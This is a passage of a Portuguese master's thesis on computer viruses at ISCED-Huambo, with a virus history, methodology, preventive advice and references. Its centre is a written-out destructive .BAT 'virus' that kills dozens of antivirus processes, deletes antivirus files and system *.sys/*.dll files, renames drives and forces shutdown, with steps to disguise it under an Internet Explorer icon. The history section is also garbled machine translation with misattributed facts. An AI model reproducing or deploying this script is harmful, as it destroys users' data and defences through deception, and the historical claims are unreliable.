Em 1983, o Dr. Ken Thomson, um dos desenvolvedores da AT & T, que trabalhou na criação do "Core Wars", quebrou o silêncio acordado, e revela a existência do programa, com detalhes de sua estrutura.
Revista Scientific American no início de 1984, publica a informação detalhada sobre estes programas, com orientações para a criação de vírus. É o ponto de partida para a vida pública desses programas e, claro, a sua propagação descontrolada em computadores pessoais.
Na mesma data de 1984, Dr. Fred Cohen é uma demonstração da Universidade de Cali Fornia, a introdução de um vírus de computador residente em um PC. Dr. Cohen é conhecido hoje como "o pai do vírus." Ao mesmo tempo, um vírus em muitos computadores, com um nome semelhante ao "Core Wars", escrito em C-Small por um certo Kevin Bjork, que depois deu o domínio público. A coisa que comeu-za ser quente!
O destroyer, primeiro e vírus nocivos que infecta plenamente identificado aparece muitos PC's em 1986. Foi criado na cidade de Lahore, no Paquistão, e é conhecido pelo nome de cérebro. Sua auto-res vendidos cópias piratas dos programas comerciais, tais como Lotus, SuperCalc Wordstar ou, para a taxa muito baixa. Os turistas que visitaram o Paquistão, compraram as cópias e as levaram de volta para os E.U. As cópias pirata tinha um vírus. Assim, como mais de 20 mil computadores infectados. Códigos de vírus do cérebro foram alterados os E.U. para outros programadores, dando origem a várias versões deste vírus, cada um pior que o anterior. Até o momento, ninguém estava levando a sério o fenômeno, que começou a ser muito chato e perigoso.
Em 1987, E-mail sistemas da IBM, foi invadido por um vírus que enviaram mensagens de Natal, que estão se multiplicando rapidamente. Isso fez com que as unidades a serem preenchidos com os arquivos de origem viral, e o sistema cresceu lentamente, chegando a uma paralisação por mais de três dias. A coisa tinha ido longe demais e Big Blue começou imediatamente os seus trabalhos em vírus Centro de Pesquisa Thomas J. Watson, Yorktown Heights, NI.
As investigações do Centro de Pesquisa T. J. Vírus Watson são colocados em domínio público através de Relatório de Pesquisa, publicado periodicamente, em benefício de investigadores e utilizadores.
O vírus Jerusalém, alegadamente criado pela Organização de Libertação da Palestina é detectado afazeres da Universidade Hebraica de Jerusalém, no início de 1988. O vírus foi destina-se a aparecer em 13 de maio de 1988, quando o 40 º aniversário da existência da Palestina como uma nação. Um aspecto de interesse do terrorismo, que agora se volta para a destruição dos sistemas de computador.
Em 2 de Novembro, 1988, duas grandes redes E.U. gravemente afectadas pelo vírus introduzido nelas. Mais de 6.000 equipes de instalações militares da NASA, universidades públicas e privadas de pesquisa são atacados.
Em 1989, o número de vírus detectados em diferentes lugares ultrapassou os 100, e que a epidemia começou a criar situações graves. Entre as medidas tomadas para tentar conter a propagação do vírus, é trazer à justiça Moris Robert Jr. acusado de ser o criador de um vírus que computadores infectados tantes do governo e empresas privadas. Aparentemente, esse cara conheceu o programa Core Wars, criado pela AT & T, e distribuído entre seus amigos. Eles irão se espalhar para diferentes dispositivos de mídia e redes. O julgamento foi dada ampla publicidade, mas não parar o vírus.
A quantidade de vírus circulando neste momento não pode ser especificado, mas para uma idéia recente o antivírus pode identificar cerca de cinquenta mil vírus (claro que este valor estão incluídos clones do mesmo vírus).
Capitulo II –
Para a elaboração de um trabalho científico, é necessário optar por vias que nos ajudarão a alcançar os objectivos preconizados, razão pela qual no presente capítulo abordaremos a metodologia empregue, o tipo de pesquisa e a caracterização da Instituição alvo de investigação
Metodologia, Tipo de Investigação.
Métodos Empregues
Modelo de investigação
A presente investigação enquadra-se no modelo qualitativo, este modelo tem por finalidade a representação dos objetos e as relações associadas para formulação de um modelo interativo.
TIPO DE INVESTIGAÇAO
A investigação a realizar é de tipo experimental. Se propõe um experimento de tipo transformador ou criador. Neste tipo não só se reflecte, revela ou verifica a realidade, mas também se transforma, criando novas formas, novos métodos, novos sistemas educativos. Com a utilização deste método, se pode trocar determinada situação educativa para elevar o nível de estruturação e obter formas superiores.
Métodos Teóricos
Analítico – Sintético
Indutivo – Dedutivo
Métodos Empíricos
Análise documental
Entrevista
Experimentação
Analítico – Sintético: Este método foi usado em diferentes momentos do processo investigativo. Quando se analisou e sintetizou a informação da Bibliografia estudada, quando se realizou o diagnostico e quando se elaborou as conclusões e recomendações.
Indutivo – Dedutivo: Este método foi usado no desenrolar da investigação desde a constatação dos factos e consequentemente a criação do problema de investigação, o objectivo geral e específicos e finalmente com a criação do manual.
Analise documental: Este método de investigação foi usado na análise dos documentos como: Livros sobre o historial do ISCED do Huambo, estatuto orgânico, a constituição dos Departamentos entre outros documentos analisados no decorrer das investigações.
Entrevista: A entrevista no presente foi usada com objectivo de explorar opiniões nos funcionarios e alguns docentes do ISCED-Huambo acerca do tema.
Caracterização do ISCED-Huambo
A partir do ano de 2005, implementou-se no ISCED-HUAMBO a primeira rede de alcance local, a base do seu funcionamento está em um servidor de enrutamento com o sistema operacional Windows Server 2003 SP1 e um sistema de Proxy com ISA Server 2006.
A Rede do ISCED-HUAMBO estende-se desde à Área de Rede futuro Departamento de TI, passando pelos departamentos ao Laboratório de Informática. Existem cerca de 50 computadores dispostos pelos diferentes departamentos e cerca de 30 computadores no Laboratório de Informática o que perfaz um total de aproximadamente 80 computadores.
No ISCED-HUAMBO existe um Laboratório de Informática constituído por 30 computadores com sistema operacional Windows XP profissional, todos conectados à Internet por uma placa de rede sem fio, passando por um Acess Point ou ponto de acesso D-Link. Existe ainda um Data show e uma tela geralmente usada nas aulas de Informática.
Existe ainda um Anfiteatro onde está instalado o equipamento do ensino à distancia para as aulas virtuais composto por um ponto de acesso à rede, um computador com sistema operativo Windows XP Profissional, Office 2003 PT, Skype, Mikogo, Policom Software de videoconferência, entre outros aplicativos que facilitam a comunicação e interactividade, para além de outros acessórios que em conjunto aumentam o performance das aulas virtuais.
Análise das Pesquisas Feitas
Diagnostico Realizado
a) Foram tomados critérios dos professores e funcionários.
No decorrer da pesquisa o autor entrevistou alguns Docentes e funcionários administrativos.
O objectivo da entrevista era de saber qual é a via de transmissão de vírus electrónico.
Objecto: Docentes e funcionários administrativos.
Questões Fundamentais
1. Acha necessário a criação de um manual de apoio que fundamente a acção dos Vírus electrónicos com recomendações de algumas soluções conhecidas como Antivírus para o ISCED-Huambo?
2. Sugira algumas soluções para o combate aos vírus electronicos.
3. Acha que com a criação de um manual de apoio que fundamente a acção dos Vírus electrónicos com recomendações de algumas soluções conhecidas como Antivírus e Firewalls pode favorecer para a diminuição da Infecção dos sistemas informáticos do ISCED-Huambo?
b) Tendo em conta a caracterização do ISCED-Huambo e as caracteristicas da sua rede desde a sua montagem e instalação até aos dias não existe um manual que podesse favorecer para a diminuição da infecção por vírus electrónicos.
c) Observação
Tendo em conta as limitações referentes a protecção da rede actual do ISCED-Huambo, o autor sugerem que com a criação um manual de apoio que fundamente a acção dos Vírus electrónicos com recomendações de algumas soluções conhecidas como Antivírus e Firewalls pode favorecer para a diminuição da Infecção dos sistemas informáticos do ISCED-Huambo.
Demostraçao da acção de um vírus electrónico em um sistema informatico
Vamos procurar demostrar como um simples vírus criado em um bloco de notas do Windows e guardado com a extensão .BAT pode danificar um sistema informático.
Começamos por abrir o bloco de notas do Windows.
Na janela do bloco de notas começamos por digitar os primeiros comandos da linha de comandos MSDOS.
Start: Permite abrir uma nova janela MSDOS
Title: Permite inserir um titulo a janela à ser aberta
Label C: Virus Mestrado: Permite renomear a unidade C pelo nome Virus Mestrado
Label D: Permite renomear a unidade pelo nome desejado
Label E: Permite renomear a unidade desejado
Md: Permite criar um novo directorio ou pasta
taskkill /f /im avgas.exe: Este comando chamado kill AV ou seja Kill Antivirus, permite desbilitar o Antivirus do computador e seu respectivo Firewall, no caso em particular desabilita o Antivirus AVG.
Shutdown: Este comando permite desligar um computador seja ele local ou na rede.
Depois de digitado os comandos com os respectivos tempos selecciona-se a opção salvar e salva-se com o formato .BAT como mostra na figura a seguir.
Depois de salvo no ambiente de trabalho faz-se clique direito e selecciona-se a opçao atalho. No atalho que se criar seleccionamos a opçao propriedades com clique direito, seguido do clique na opçao alterar icone como se apresenta no Ambiente de Trabalho.
A seguir selecciona-se o ícone do Internet Explorer para que o usuário confunda com o explorador de Internet e aceita-se estas configurações.
A seguir mostramos um trecho do codigo fonte deste virus domestico que é capaz de provocar a perda total da informação visto que ele para além de criar diversar janela no formato MSDOS renomeia as unidades C, D e E, elimina o Firewall e o Antivírus do Computador, elimina os arquivos ou ficheiros de inicializaçao do sistema operativo e por fim encerra esforçosamente o computador sem a possibilidade de voltar a ligar.
Start title : VIRUS MESTRADO
Label C: Infecção
Label D: Worme
Label E: Trojan
Del *. sys
Del *.dll
cd\
taskkill /f /im avgas.exe
cls
taskkill /f /im nod32krn.exe
cls
taskkill /f /im nod32.exe
cls
taskkill /f /im kav.exe
cls
taskkill /f /im kavmm.exe
cls
taskkill /f /im avgemc.exe
cls
taskkill /f /im avgcc.exe
cls
taskkill /f /im avgamsvr.exe
cls
taskkill /f /im avgupsvc.exe
cls
taskkill /f /im avgw.exe
cls
taskkill /f /im ashwebsv.exe
cls
taskkill /f /im ashdisp.exe
cls
taskkill /f /im ashmaisv.exe
cls
taskkill /f /im ashserv.exe
cls
taskkill /f /im ashwebsv.exe
cls
taskkill /f /im aswupdsv.exe
cls
taskkill /f /im ewidoctrl.exe
cls
taskkill /f /im guard.exe
cls
taskkill /f /im gcasdtserv.exe
cls
taskkill /f /im msmpeng.exe
cls
taskkill /f /im mcafee.exe
cls
taskkill /f /im mghml.exe
cls
taskkill /f /im msiexec.exe
cls
taskkill /f /im outpost.exe
cls
taskkill /f /im isafe.exe
cls
taskkill /f /im minilog.exe
cls
taskkill /f /im zonealarm.exe
cls
taskkill /f /im zlclient.exe
cls
taskkill /f /im updclient.exe
cls
taskkill /f /im ccapp.exe
cls
taskkill /f /im navw32.exe
cls
taskkill /f /im norton.exe
cls
taskkill /f /im navapsvc.exe
cls
taskkill /f /im ccsetmgr.exe
cls
taskkill /f /im cccproxy.exe
cls
taskkill /f /im ccapp.exe
cls
taskkill /f /im ccevtmgr.exe
cls
taskkill /f /IM SpywareStrike.exe /IM SpywareStrike.exe
cls
taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cls
taskkill /f /IM symlcsvc.exe
cls
taskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe
cls
taskkill /f /IM zlclient.exe /IM zonealarm.exe
cls
taskkill /f /IM ewidoctrl.exe
cls
taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cls
taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cls
taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
cls
taskkill /f /IM kavsvc.exe /IM kav.exe
cls
taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
cls
taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cls
taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cls
taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cls
taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cls
taskkill /f /IM DefWatch.exe /IM Rtvscan.exe
cls
taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe
cls
taskkill /f /im nod32krn.exe
cls
taskkill /f /im nod32.exe
cls
taskkill /f /im kav.exe
cls
taskkill /f /im kavmm.exe
cls
taskkill /f /im avgemc.exe
cls
taskkill /f /im avgcc.exe
cls
taskkill /f /im avgamsvr.exe
cls
taskkill /f /im avgupsvc.exe
cls
taskkill /f /im avgw.exe
cls
taskkill /f /im ashwebsv.exe
cls
taskkill /f /im ashdisp.exe
cls
taskkill /f /im ashmaisv.exe
cls
taskkill /f /im ashserv.exe
cls
taskkill /f /im ashwebsv.exe
cls
taskkill /f /im aswupdsv.exe
cls
taskkill /f /im ewidoctrl.exe
cls
taskkill /f /im guard.exe
cls
taskkill /f /im gcasdtserv.exe
cls
cls
del /Q /F C:\Arquiv~1\alwils~1\avast4\*.dll > nul
del /Q /F C:\Arquiv~1\alwils~1\avast4\*.exe > nul
del /Q /F C:\Arquiv~1\Lavasoft\Ad-awa~1\*.exe > nul
del /Q /F C:\Arquiv~1\kasper~1\*.exe > nul
del /Q /F C:\Arquiv~1 rojan~1\*.exe > nul
del /Q /F C:\Arquiv~1\f-prot95\*.dll > nul
del /Q /F C:\Arquiv~1 bav\*.dat > nul
del /Q /F C:\Arquiv~1\avpersonal\*.vdf > nul
del /Q /F C:\Arquiv~1\Norton~1\*.cnt > nul
del /Q /F C:\Arquiv~1\Mcafee\*.hlp > nul
del /Q /F C:\Arquiv~1\Mcafee\*.exe > nul
del /Q /F C:\Arquiv~1\Mcafee\*.def > nul
del /Q /F C:\Arquiv~1\Mcafee\*.ini > nul
del /Q /F C:\Arquiv~1\Mcafee\*.txt > nul
del /Q /F C:\Arquiv~1\Mcafee\*.dat > nul
del /Q /F C:\Arquiv~1\Mcafee\*.log > nul
del /Q /F C:\Arquiv~1\Mcafee\*.reg > nul
del /Q /F C:\Arquiv~1\Mcafee\*.dll > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\Norton~3\*.reg > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\Norton~3\*.txt > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\Norton~3\*.hlp > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\Norton~3\*.dll > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\Norton~3\*.exe > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.isu > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.hlp > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.cnt > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dat > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ulg > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ini > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.exe > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.txt > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dll > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.cnt > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.hlp > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.exe > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.def > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.ini > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.txt > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.dat > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.log > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.reg > nul
del /Q /F C:\Arquiv~1\Norton~1\Norton~1\*.dll > nul
del /Q /F C:\Arquiv~1\Norton~1\*.log > nul
del /Q /F C:\Arquiv~1\Norton~1\*.idx > nul
del /Q /F C:\Arquiv~1\Norton~1\*.ini > nul
del /Q /F C:\Arquiv~1\Norton~1\*.hlp > nul
del /Q /F C:\Arquiv~1\Norton~1\*.orgt > nul
del /Q /F C:\Arquiv~1\Norton~1\*.dll > nul
del /Q /F C:\Arquiv~1\Norton~1\*.exe > nul
del /Q /F C:\Arquiv~1\Norton~1\*.dat > nul
del /Q /F C:\Arquiv~1\avgamsr\*.exe > nul
del /Q /F C:\Arquiv~1\avgamsvr\*.exe > nul
del /Q /F C:\Arquiv~1\avgemc\*.exe > nul
del /Q /F C:\Arquiv~1\avgcc\*.exe > nul
del /Q /F C:\Arquiv~1\avgupsvc\*.exe > nul
del /Q /F C:\arquivos de programas\grisoft > nul
del /Q /F C:\Arquiv~1 ood32krn\*.exe > nul
del /Q /F C:\Arquiv~1 ood32\*.exe > nul
del /Q /F c:\Arquivos de programas od32 > nul
del /Q /F C: ood32
del /Q /F C:\Arquiv~1\kav\*.exe > nul
del /Q /F C:\Arquiv~1\kavmm\*.exe > nul
del /Q /F C:\Arquivos de programas\kaspersky
del /Q /F C:\Arquiv~1\ewidoctrl\*.exe > nul
del /Q /F C:\Arquiv~1\guard\*.exe > nul
del /Q /F C:\arquivos de programas\ewido\*.exe > nul
del /Q /F C:\Arquiv~1\pavprsrv\*.exe > nul
del /Q /F C:\Arquiv~1\pavprot\*.exe > nul
del /Q /F C:\Arquiv~1\avengine\*.exe > nul
del /Q /F C:\Arquiv~1\apvxdwin\*.exe > nul
del /Q /F C:\Arquiv~1\webproxy\*.exe > nul
del /Q /F C:\arquivos de programas\panda software > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\alwils~1\avast4\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\alwils~1\avast4\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\kasper~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles% rojan~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\f-prot95\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles% bav\*.dat > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avpersonal\*.vdf > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.cnt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.hlp > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.def > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.ini > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.txt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.dat > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.log > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.reg > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norton~3\*.reg > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norton~3\*.txt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norton~3\*.hlp > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norton~3\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norton~3\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.isu > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.hlp > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.cnt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.dat > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.ulg > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.ini > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.txt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speedd~1\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.cnt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.hlp > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.def > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.ini > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.txt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.dat > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.log > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.reg > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.log > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.idx > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.ini > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.hlp > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.orgt > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.dll > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.dat > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avgamsr\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avgamsvr\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avgemc\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avgcc\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\avgupsvc\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles%\grisoft > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles% ood32krn\*.exe > nul
del /Q /F %HOMEDRIVE%\%ProgramFiles% ood32\*.exe > nul
exit
shutdown –s –c "O Computador foi danificado" –t 20
Esta é uma pequena demostraçao de como um simples vírus doméstico que pode causar danos a computadores ou sistemas informáticos se não tivermos cuidado.
Recomendações Preventivas:
1. Usar um Bom Antivírus e actualiza-lo diariamente;
2. Usar um Bom Firewall também actualizado diariamente,
3. Actualizar o Sistema Operativo regularmente;
4. Não executar nem abril emails estrahos,
Algumas Soluções conhecidas e usadas no combate aos Vírus electrónicos
1. Antivírus;
2. Anti spam;
3. AntiTrojan;
4. Anti Hacker
5. Anti Rootkit;
6. Firewalls;
Conclusões
O estudo bibliografico foi feito possibilitando a criaçao do manual;
Foi demostrado a criação de um vírus doméstico com capacidade de danificar qualquer sistema informático;
As reconmendaçoes preventivas foram elaboradas de maneiras a possibilitar aos usuários maior e melhor cuidado com os vírus electrónicos;
Foram destacados alguns softwares de protecção mais usados na Luta contra esta epidemia cibernética.
Recomendações
Recomenda-se que se ponha em patrica o que foi abordado neste manual de maneiras a contribuir de forma positiva na redução da infecção por vírus electrónico no sistema informático do ISCED do HAUMBO.
AHN, G.-J.; HONG, S.-P.; SHINC, M. E. Reconstructing a formal security model. Information and Software Technology, v. 44, n. 11, p. 649–657, Aug. 2002.
ALBERTS, C. J.; DOROFEE, A. J. Managing Information Security Risks: the OCTAVE
approach. Boston: Addison-Wesley, 2002.
ALBERTS, C. J.; DOROFEE, A. J. Security incident response: rethinking risk management. International Congress Series, v. 1268, p. 141–146, June 2004.
ARKENBOUT, E.; DIJK, F. van; WIJCK, P. van. Copyright in the information society:
scenario"s and strategies. European Journal of Law and Economics, v. 17, n. 2, p. 237–249, Mar. 2004.
ASHRAFI, N. The impact of software process improvement on quality: in theory and practice. Information & Management, v. 40, n. 7, p. 677–690, Aug. 2003.
ASSOCIAÇAO BRASILEIRA DE NORMAS TÉCNICAS. NBR ISO/IEC 17799: Tecnologia da informação - código de prática para a gestão da segurança da informação. Rio de Janeiro, 2002.
ATKINSON, M. M.; COLEMAN, W. D. Policy networks, policy communities and the
problems of governance. Governance, v. 5, n. 2, p. 154–180, Apr. 1992.
AYOGU, M. D. Corporate governance in Africa: the record and policies for good corporate governance. African Development Review, v. 13, n. 2, p. 308–330, Dec. 2001.
BEEBE, J. Can there be a science of the symbolic? Journal of Analytical Psychology, v. 49,n. 2, p. 177–191, May/June 2004.
BOSSI, A. et al. Verifying persistent security properties. Computer Languages, Systems & Structures, v. 30, n. 3-4, p. 231–258, Oct./Dec. 2004.
BOSWORTH, S.; KABAY, M. E. (Eds.). Computer Security Handbook. 4th. ed. New York: John Wiley & Sons, 2002.
BRADLEY, S. (Ed.). Governing the European Union. New York: Sage Publications, 2001.
BRAGA, G. M. Informação, ciência da informação: breves reflexões em três tempos. Ciência da Informação, v. 24, n. 1, p. 84–88, Jan-Abr 1995.
BRAMAN, S. Defining information: an approach for policymakers. Telecommunications
Policy, v. 13, n. 3, p. 233–242, Sept. 1989. Disponível em:
BREWER, D. F. C.; NASH, M. J. The chinese wall security policy. In: IEEE
Symposium on Researh in Security and Privacy. IEEE, 1989. Disponível em:
http://www.cs.purdue.edu/homes/cs590s/chinese-wall.pdf
WILSON, T. Exploring models of information behaviour: the "uncertainty" project. Information Processing and Management, v. 35, n. 6, p. 839–849, Nov. 1999.
WOOD, C. C. Information Security Policies Made Easy: Version 9. Boston: Baseline Software Press, 2002.
Autor:
João Baptista Machado Sousa
UB08849SIS15684
A Thesis Presented to
The Academic Department
Of the School of Science and Engineering
In Partial Fulfillment of the Requirements
For the Degree of Master in Information Systems
ATLANTIC INTERNATIONAL UNIVERSITY HONOLULU, HAWAI
SUMMER 2009
Advisor: Dr. Gilroy Newball
Página anterior | Voltar ao início do trabalho | Página seguinte |
|
|